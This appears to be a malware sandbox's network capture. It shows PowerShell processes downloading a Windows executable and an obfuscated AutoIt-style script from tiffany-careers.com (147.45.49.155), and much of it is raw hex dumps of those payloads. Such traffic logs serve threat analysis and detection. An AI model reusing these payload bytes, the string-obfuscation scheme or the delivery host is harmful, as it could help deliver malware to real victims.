2024-12-28 08:35:29 UTC	16384	IN	Data Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8 Data Ascii: HID$Q\|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%\|$4C}HEH\|$xD$4HMH}x
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09 Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
2024-12-28 08:35:30 UTC	16384	IN	Data Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45 Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
2024-12-28 08:35:30 UTC	16384	IN	Data Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48 Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
2024-12-28 08:35:30 UTC	16384	IN	Data Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80 Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49722	147.45.49.155	443	7556	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:37 UTC	173	OUT	GET /kSMAbiand HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: tiffany-careers.com Connection: Keep-Alive
2024-12-28 08:35:37 UTC	397	IN	HTTP/1.1 200 OK etag: "da2a8-676c1060-23c5d;;;" last-modified: Wed, 25 Dec 2024 14:02:08 GMT content-length: 893608 accept-ranges: bytes date: Sat, 28 Dec 2024 08:35:37 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDRRRCPS_@a_@_@g[j[[jwR+r*S_@SRPSRichR
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 03 03 04 55 8b ec 56 8b f1 e8 b2 01 00 00 8a 45 08 88 06 8b c6 c7 46 0c 09 00 00 00 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 53 56 57 8b f9 89 7d f8 e8 a5 fb ff ff 8b 37 8b ce e8 04 fa ff ff 8b 06 8b 5d 08 c7 80 10 02 00 00 00 00 00 00 8b 5b 08 89 5d f4 85 db 0f 84 b2 00 00 00 53 6a 01 ff 37 e8 cd f8 ff ff 83 c4 0c 33 f6 85 db 0f 84 9b 00 00 00 8b 45 08 6a 10 8b 40 04 8b 1c b0 e8 56 c3 01 00 8b f8 83 c4 04 85 ff 74 7e 8b 0b 89 0f 8b 4b 04 89 4f 04 8b 4b 08 89 4f 08 8b 43 0c 89 47 0c ff 00 8b 5d f8 8d 45 e4 56 6a 01 50 ff 33 89 7d ec c7 45 f0 04 00 00 00 e8 04 f7 ff ff 83 c4 10 85 ff 74 21 8b 47 0c ff 08 8b 47 0c 83 38 00 0f 84 34 8d 03 00 57 e8 72 c3 01 00 83 c4 04 c7 45 ec 00 00 00 00 46 c7 45 f0 01 00 00 00 c7 45 e4 Data Ascii: UVEF^]U SVW}7][]Sj73Ej@Vt~KOKOCG]EVjP3}Et!GG84WrEFEE
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 13 ca 99 3b 45 fc 0f 85 a9 88 03 00 3b d1 0f 85 a1 88 03 00 8b 45 ec 89 03 8b 55 d8 89 55 fc 8b 4b 08 85 c9 0f 85 d4 88 03 00 8b 4d e0 85 c9 0f 85 e1 88 03 00 8b 45 e4 83 f8 05 0f 8d ed 88 03 00 d9 ee dd 55 d8 c7 45 e4 03 00 00 00 8b 4e 0c 8b c1 c1 e0 06 8b 80 14 5f 4a 00 83 f8 03 0f 85 6c 89 03 00 83 f9 01 0f 85 18 8a 03 00 db 06 de d9 df e0 f6 c4 05 0f 8b 8d 89 03 00 8b 4f 1c 8b c1 c1 e0 04 03 43 0c 8b 04 85 08 5f 4a 00 83 f8 01 0f 85 93 00 00 00 83 f9 01 0f 85 6a 8b 03 00 8b 47 10 89 45 fc 8b f0 8b 43 0c 83 f8 01 0f 85 f9 8b 03 00 8b 03 3b f0 7c 29 8b 4f 04 8b 45 0c 41 89 08 8b 4d e0 85 c9 0f 85 89 8c 03 00 8b 45 e4 83 f8 05 0f 8d 8f 8c 03 00 5f 5e 5b 8b e5 5d c2 08 00 8b 75 f8 81 c6 5c 01 00 00 80 7e 09 00 0f 85 45 8c 03 00 80 7e 08 00 75 5f 8b 7e 04 Data Ascii: ;E;EUUKMEUEN_JlOC_JjGEC;\|)OEAME_^[]u\~E~u_~
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 93 00 00 00 e9 cf 7c 03 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 b2 7c 03 00 8b 45 f8 48 4e 83 7d 94 00 89 45 f8 74 2e 8d 4d 94 e8 51 34 01 00 8d 4d 94 8b 18 e8 55 34 01 00 8b 45 f8 85 c0 78 08 3b f3 0f 84 1d fd ff ff 57 6a 78 e9 88 7c 03 00 8d 5e 01 eb 9d 8d 5e 01 eb e2 8d 5e 01 e9 45 fd ff ff 8d 5e 01 e9 17 fe ff ff 8b ff a9 c8 40 00 b3 48 44 00 5e cb 40 00 6e cb 40 00 41 ca 40 00 9b cb 40 00 09 cc 40 00 80 cb 40 00 cf cb 40 00 4f c9 40 00 70 c9 40 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 53 56 57 8b 7d 08 33 f6 ba 01 00 00 00 89 74 24 18 89 74 24 20 8b d9 89 54 24 24 8b 47 04 89 74 24 10 8b 00 89 44 24 14 0f bf 40 08 83 f8 33 75 28 57 e8 a0 cf ff ff 8b 4c 24 20 85 c9 75 3c 8b 74 24 18 8b 54 24 24 83 fa 05 0f 8d a8 7c 03 00 5f 5e 5b 8b e5 5d Data Ascii: \|AjYf9H\|EHN}Et.MQ4MU4Ex;Wjx\|^^^E^@HD^@n@A@@@@@O@p@USVW}3t$t$ T$$Gt$D$@3u(WL$ u<t$T$$\|_^[]
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 00 00 8b 5d 10 33 c0 6a ff 50 8b cb c6 45 cf 00 89 45 a0 e8 69 0d 00 00 83 7d 0c 00 75 04 c6 45 cf 01 8d 4d d0 e8 dd 05 00 00 8d 4d b4 e8 d5 05 00 00 33 d2 33 f6 89 55 c4 89 75 f0 8d 64 24 00 80 7d cf 00 0f 84 bf df 03 00 83 7f 14 00 0f 84 89 03 00 00 80 7f 10 00 0f 84 7f 03 00 00 83 fa ff 0f 84 76 03 00 00 8b 4f 1c 3b d1 0f 8f 6b 03 00 00 ff 77 24 8b 47 34 ff 77 20 0b 47 2c 50 52 8b 57 18 51 ff 37 8b 4f 14 e8 12 ea ff ff 8b c8 83 c4 18 89 4f 28 85 c9 0f 8e 30 03 00 00 8b 47 20 8b 50 04 c7 47 2c 00 00 00 00 8b 18 3b 58 04 89 5d c8 8b 5d 10 0f 84 5c df 03 00 89 55 c4 85 c9 0f 84 16 03 00 00 8b 47 20 8b 30 8b 45 f0 2b f0 0f 84 a3 02 00 00 8b 4f 04 3b c1 0f 83 98 02 00 00 83 fe ff 0f 84 2c 03 00 00 03 c6 3b c1 0f 87 1f 03 00 00 8b 4d c0 8b 01 83 f8 01 0f 8f Data Ascii: ]3jPEEi}uEMM33Uud$}vO;kw$G4w G,PRWQ7OO(0G PG,;X]]\UG 0E+O;,;M
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: b8 00 47 3b 7e 08 73 e0 eb e5 56 8b f1 c7 06 c4 09 49 00 e8 c5 ff ff ff ff 76 04 e8 3c c4 00 00 59 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b d9 57 33 ff 39 7b 08 76 40 56 8d 64 24 00 8b 73 04 8b 34 be 85 f6 74 16 8b 46 0c ff 08 8b 46 0c 83 38 00 74 29 56 e8 ff c3 00 00 83 c4 04 8b 43 04 c7 04 b8 00 00 00 00 47 3b 7b 08 72 d0 c7 43 08 00 00 00 00 5e 5f 5b c3 89 7b 08 eb f8 ff 36 e8 d5 c3 00 00 ff 76 0c e8 cd c3 00 00 83 c4 08 eb c3 55 8b ec 56 8b f1 8b 46 0c 39 46 08 75 2f 8d 0c 00 6a 08 58 3b c8 73 5f 57 33 c9 89 46 0c 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 22 c3 00 00 83 7e 04 00 8b f8 59 75 42 89 7e 04 5f 6a 10 e8 0e c3 00 00 8b d0 59 85 d2 74 51 8b 45 08 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 40 0c 89 42 0c ff 00 8b 4e 08 8b 46 Data Ascii: G;~sVIv<Y^SW39{v@Vd$s4tFF8t)VCG;{rC^_[{6vUVF9Fu/jX;s_W3FjZQ"~YuB~_jYtQEHJHJ@BNF
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 05 f4 2b 4c 00 38 04 47 00 c7 05 f8 2b 4c 00 00 00 00 00 c7 05 fc 2b 4c 00 00 00 00 00 c7 05 00 2c 4c 00 02 00 00 00 c7 05 04 2c 4c 00 02 00 00 00 c6 05 08 2c 4c 00 00 c7 05 0c 2c 4c 00 08 15 49 00 c7 05 18 2c 4c 00 94 04 47 00 c7 05 1c 2c 4c 00 00 00 00 00 c7 05 20 2c 4c 00 00 00 00 00 c7 05 24 2c 4c 00 02 00 00 00 c7 05 28 2c 4c 00 02 00 00 00 c6 05 2c 2c 4c 00 00 c7 05 30 2c 4c 00 28 15 49 00 c7 05 3c 2c 4c 00 f0 04 47 00 c7 05 40 2c 4c 00 00 00 00 00 c7 05 44 2c 4c 00 00 00 00 00 c7 05 48 2c 4c 00 02 00 00 00 c7 05 4c 2c 4c 00 02 00 00 00 c6 05 50 2c 4c 00 00 c7 05 54 2c 4c 00 4c 15 49 00 c7 05 60 2c 4c 00 30 05 47 00 c7 05 64 2c 4c 00 00 00 00 00 c7 05 68 2c 4c 00 00 00 00 00 c7 05 6c 2c 4c 00 02 00 00 00 c7 05 70 2c 4c 00 03 00 00 00 c6 05 74 2c 4c Data Ascii: +L8G+L+L,L,L,L,LI,LG,L ,L$,L(,L,,L0,L(I<,LG@,LD,LH,LL,LP,LT,LLI`,L0Gd,Lh,Ll,Lp,Lt,L
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: cb 41 00 a6 cb 41 00 9d 12 45 00 ba 12 45 00 71 cb 41 00 ae cb 41 00 61 12 45 00 6e 12 45 00 ef 12 45 00 ff 12 45 00 0d 13 45 00 27 13 45 00 b4 cb 41 00 55 8b ec 83 ec 10 53 8b d9 89 4d f0 56 33 c9 57 8b fa 41 89 7d f4 33 d2 89 4d f8 0f b7 03 8d 73 04 b9 85 00 00 00 c7 45 fc 01 00 00 00 66 3b c1 0f 84 c8 00 00 00 83 c1 05 66 3b c1 0f 84 bc 00 00 00 b9 86 00 00 00 66 3b c1 0f 84 ae 00 00 00 83 c1 05 66 3b c1 0f 84 a2 00 00 00 0f b7 06 3d a1 00 00 00 0f 87 e4 00 00 00 0f b6 80 0f ce 41 00 ff 24 85 8b cd 41 00 ff 75 08 ff 75 0c 52 8d 56 02 8b cf e8 f5 01 00 00 83 c4 0c 33 d2 8b 4d f8 8b 5d f0 6a 77 0f b7 43 02 8d 1c 43 58 89 5d f0 66 39 03 0f 84 71 ff ff ff 8b c1 5f 5e 5b 8b e5 5d c3 66 83 3e 70 8b ca 0f 84 ea 47 03 00 8d 4e 02 83 c6 22 85 c9 74 12 6a 20 8b Data Ascii: AAEEqAAaEnEEEE'EAUSMV3WA}3MsEf;f;f;f;=A$AuuRV3M]jwCCX]f9q_^[]f>pGN"tj
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 33 41 fe ff 8d 45 e8 50 ff 77 08 e8 1a 34 ff ff ff 75 e8 68 a8 2c 49 00 56 e8 e7 3e 00 00 83 c4 0c 89 45 f8 80 7d ff 00 0f 85 12 5d 03 00 8d 4d e8 e8 80 10 ff ff 8b 7d f8 56 e8 8b 40 00 00 59 83 fb ff 74 19 53 56 e8 ba 3c 00 00 59 50 e8 e1 3a 00 00 59 59 8b c7 5f 5e 5b 8b e5 5d c3 68 00 40 00 00 eb e1 55 8b ec 51 51 56 57 8b f9 c7 45 f8 01 00 00 00 33 c0 8b f2 88 45 ff 85 ff 74 74 8b 06 0f b7 04 47 50 e8 e1 2b 00 00 59 85 c0 75 67 8b 0e 33 d2 53 8b 5d 08 0f b7 04 4f 89 13 83 e8 2b 74 5c 48 48 74 54 8b 06 66 39 14 47 74 32 8b 06 0f b7 04 47 50 e8 d3 31 00 00 59 85 c0 74 21 6b 03 0a 8b 16 c6 45 ff 01 0f b7 0c 57 83 c0 d0 03 c1 8d 4a 01 89 03 33 c0 89 0e 66 39 04 4f 75 ce 8b 0b 0f af 4d f8 8a 45 ff 89 0b 5b 5f 5e 8b e5 5d c3 32 c0 eb f6 ff 06 eb 84 83 4d f8 Data Ascii: 3AEPw4uh,IV>E}]M}V@YtSV<YP:YY_^[]h@UQQVWE3EttGP+Yug3S]O+t\HHtTf9Gt2GP1Yt!kEWJ3f9OuME[_^]2M
2024-12-28 08:35:38 UTC	16384	IN	Data Raw: 00 8b c3 e8 6d 3f 00 00 c3 8b 5d e4 8b 7d 08 57 e8 98 22 00 00 59 c3 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 fb 00 00 00 59 eb 2f 56 e8 2c 00 00 00 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 bc fc ff ff 50 e8 26 a4 00 00 f7 d8 59 59 1b c0 eb 02 33 c0 5e 5d c3 55 8b ec 53 56 8b 75 08 33 db 8b 46 0c 24 03 3c 02 75 42 f7 46 0c 08 01 00 00 74 39 57 8b 3e 2b 7e 08 85 ff 7e 2e 57 ff 76 08 56 e8 79 fc ff ff 59 50 e8 22 8e 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 4e 08 8b c3 83 66 04 00 89 0e 5e 5b 5d c3 6a 01 e8 5b 00 00 00 59 c3 6a 0c 68 30 cc 4b 00 e8 5a 3e 00 00 33 ff 89 7d e4 8b 75 08 85 f6 75 09 57 e8 3b 00 00 00 59 eb 24 56 e8 4d 21 00 00 59 89 7d fc 56 e8 1c ff ff ff 59 8b f8 89 Data Ascii: m?]}W"YUVuuVY/V,YtF@tVP&YY3^]USVu3F$<uBFt9W>+~~.WvVyYP";uFyFN _Nf^[]j[Yjh0KZ>3}uuW;Y$VM!Y}VY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49728	147.45.49.155	443	7640	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:43 UTC	81	OUT	GET /tlUmNmGG.txt HTTP/1.1 Host: tiffany-careers.com Connection: Keep-Alive
2024-12-28 08:35:43 UTC	425	IN	HTTP/1.1 200 OK etag: "119f82-676c105d-23c4d;;;" last-modified: Wed, 25 Dec 2024 14:02:05 GMT content-type: text/plain content-length: 1154946 accept-ranges: bytes date: Sat, 28 Dec 2024 08:35:43 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-12-28 08:35:43 UTC	16384	IN	Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $
2024-12-28 08:35:43 UTC	16384	IN	Data Raw: 63 75 72 72 65 64 4c 61 79 6f 75 74 20 3d 20 38 38 20 54 68 65 6e 0a 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 39 0a 24 53 57 49 53 53 45 53 50 4e 53 48 45 46 46 49 45 4c 44 20 3d 20 38 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 57 61 6c 65 73 28 22 36 36 5d 31 31 31 5d 39 38 5d 31 30 39 5d 31 31 32 5d 31 30 34 5d 33 34 5d 37 31 5d 31 30 32 5d 39 38 5d 31 31 37 5d 33 34 5d 36 36 5d 31 30 39 5d 31 30 34 5d 31 30 32 5d 31 31 35 5d 31 30 36 5d 39 38 5d 33 34 5d 38 33 5d 31 30 32 Data Ascii: curredLayout = 88 Then$REJECTRESERVOIRLOCKENJOYED = 89$SWISSESPNSHEFFIELD = 80For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 6d 65 6c 69 6e 65 20 3d 20 35 37 0a 24 46 6f 72 75 6d 73 49 73 74 61 6e 62 75 6c 20 3d 20 37 38 0a 57 68 69 6c 65 20 31 33 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 35 35 20 54 68 65 6e 0a 44 65 63 28 57 61 6c 65 73 28 22 38 31 5d 31 31 38 5d 31 32 34 5d 31 30 32 22 2c 34 30 2f 35 29 29 0a 41 43 6f 73 28 31 30 30 33 29 0a 44 65 63 28 57 61 6c 65 73 28 22 31 31 37 5d 31 30 34 5d 31 30 32 5d 31 32 34 5d 31 30 32 5d 31 31 31 5d 31 30 38 5d 31 31 33 5d 31 30 36 5d 34 38 5d 31 31 39 5d 31 30 38 5d 31 30 34 5d 34 38 22 2c 33 2f 31 29 29 0a 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 3d 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 4d 65 61 73 75 72 65 54 69 6d 65 6c 69 6e 65 20 Data Ascii: meline = 57$ForumsIstanbul = 78While 13If $MeasureTimeline = 55 ThenDec(Wales("81]118]124]102",40/5))ACos(1003)Dec(Wales("117]104]102]124]102]111]108]113]106]48]119]108]104]48",3/1))$MeasureTimeline = $MeasureTimeline + 1EndIfIf $MeasureTimeline
2024-12-28 08:35:44 UTC	16384	IN	Data Raw: 39 31 5d 31 32 39 5d 31 31 38 5d 31 30 38 5d 31 31 33 5d 31 30 37 5d 31 30 35 5d 31 32 34 5d 31 31 33 5d 31 31 39 5d 31 31 38 5d 35 35 5d 37 33 5d 31 32 36 5d 31 30 35 5d 31 31 33 5d 31 31 36 5d 31 30 35 5d 31 30 36 5d 31 31 36 5d 31 30 39 5d 35 35 22 2c 36 34 2f 38 29 29 0a 41 54 61 6e 28 39 30 34 38 29 0a 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 3d 20 24 6c 69 73 61 6b 6e 6f 77 6c 65 64 67 65 73 74 6f 72 6d 73 68 61 72 70 69 6e 73 69 67 68 74 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 54 72 61 64 69 6e 67 4c 6f 6c 20 3d 20 33 39 0a 24 43 4f 4e 56 45 4e 49 45 4e 54 44 45 42 55 47 4e 44 4d 41 44 4f 4e 4e 41 20 3d 20 37 35 0a 57 68 69 6c 65 20 33 38 39 0a 49 66 20 24 54 72 61 64 69 6e 67 4c 6f Data Ascii: 91]129]118]108]113]107]105]124]113]119]118]55]73]126]105]113]116]105]106]116]109]55",64/8))ATan(9048)$lisaknowledgestormsharpinsight = $lisaknowledgestormsharpinsight + 1EndIfNext$TradingLol = 39$CONVENIENTDEBUGNDMADONNA = 75While 389If $TradingLo
